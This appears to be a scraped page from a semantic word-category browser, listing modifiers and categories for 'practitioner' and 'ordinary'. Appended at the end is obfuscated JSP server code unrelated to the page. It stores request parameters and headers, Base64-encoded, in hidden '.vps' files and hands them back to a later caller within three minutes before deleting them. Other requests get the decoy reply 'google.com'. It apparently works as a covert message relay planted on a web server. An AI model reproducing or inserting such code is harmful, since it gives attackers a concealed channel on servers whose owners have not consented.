Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Members for Fine-Grained Categories
ordinary_practitioner
:
lawyer,
educator,
teacher,
nurse,
ship_doctor,
dentist,
internist,
surgeon,
physician,
Modifiers matching
practitioner
:
costly,
private,
independent,
medical,
licensed,
expert,
experienced,
qualified,
successful,
relevant,
skilled,
specialized,
professional,
paramedical,
competent,
educational,
general,
dental,
influential,
single,
scientific,
ordinary,
adult,
legal,
individual,
certified,
trained,
clinical,
related,
key,
knowledgeable,
local,
small,
Simple categories matching
ordinary
:
page,
object,
artifact,
location,
thing,
solid,
item,
equipment,
chlorine,
tool,
job,
computer,
burning,
material,
entity,
fact,
lubricant,
virtue,
recording,
space,
key,
animal,
activity,
instrument,
hydrocarbon,
metal,
attitude,
expenditure,
food,
utensil,
emotion,
logic,
vitamin,
form,
condition,
bottle,
matter,
offering,
erection,
existence,
fat,
source,
jew,
quantity,
diversion,
concept,
sound,
income,
herb,
box,
suit,
card,
calling,
chemical,
fiber,
malady,
pump,
product,
arms,
pulp,
particle,
laser,
coolant,
paste,
phenomenon,
clay,
cotton,
law,
tubing,
decoration,
glasses,
map,
concern,
conveyance,
action,
service,
disposition,
component,
pest,
script,
control,
constant,
force,
anesthetic,
comet,
anaesthetic,
possession,
cabinet,
chromatography,
happening,
vehicle,
individual,
place,
sport,
function,
distance,
belief,
program,
sign,
aggregate,
smell,
passion,
residence,
repair,
gear,
beverage,
contaminant,
plant,
furniture,
measure,
claim,
wave,
semiconductor,
mixer,
experience,
cause,
means,
travel,
scanner,
glove,
information,
creditor,
container,
medium,
character,
salt,
paper,
device,
merchandise,
structure,
business,
impurity,
infection,
commodity,
shop,
group,
unit,
substrate,
fabric,
knowledge,
part,
process,
clothing,
closure,
combustible,
debt,
resin,
yarn,
sweetener,
content,
heater,
disease,
danger,
flavor,
people,
compound,
star,
writing,
being,
topology,
trauma,
receipts,
stuff,
organs,
disturbance,
hadron,
document,
table,
occupation,
morality,
sheet,
technique,
ingredient,
user,
institution,
rubber,
original,
craftsman,
miso,
noodle,
viscera,
gas,
skill,
property,
jacket,
grain,
expense,
lamp,
system,
hinge,
atom,
energy,
solvent,
protection,
nutrient,
antioxidant,
game,
operations,
meaning,
industry,
diluent,
state,
contract,
starch,
liquid,
mixture,
glue,
gelatin,
fuel,
operation,
vegetable,
boot,
method,
affection,
case,
weapon,
algorithm,
data,
queue,
surface,
file,
agonist,
duty,
illumination,
set,
funds,
association,
wood,
task,
vessel,
worker,
treatment,
starches,
benefit,
conductor,
language,
cleanser,
artisan,
article,
illness,
switch,
miracle,
keyboard,
receivables,
polymer,
processing,
quality,
prayer,
egg,
building,
fastener,
narcotic,
bus,
fibre,
cosmetic,
employee,
publication,
shape,
pet,
brush,
tape,
attribute,
devices,
wire,
creature,
spectroscopy,
feed,
event,
profession,
substance,
soil,
situation,
person,
drug,
hazard,
widget,
works,
fare,
meal,
scene,
death,
film,
oil,
cation,
network,
response,
textile,
lighting,
work,
coating,
artefact,
occurrence,
papers,
body,
waste,
carrier,
relative,
crime,
appliance,
image,
workplace,
bill,
text,
foodstuff,
meat,
toner,
music,
clothes,
token,
circuit,
acid,
environment,
aldehyde,
ability,
electrode,
apparatus,
practice,
rock,
society,
machine,
purpose,
facility,
offence,
terminal,
sensation,
offense,
filter,
woman,
fruit,
garment,
mammal,
practitioner,
change,
envelope,
cereal,
professional,
use,
pottery,
figure,
fluid,
air,
carpet,
project,
polysaccharide,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>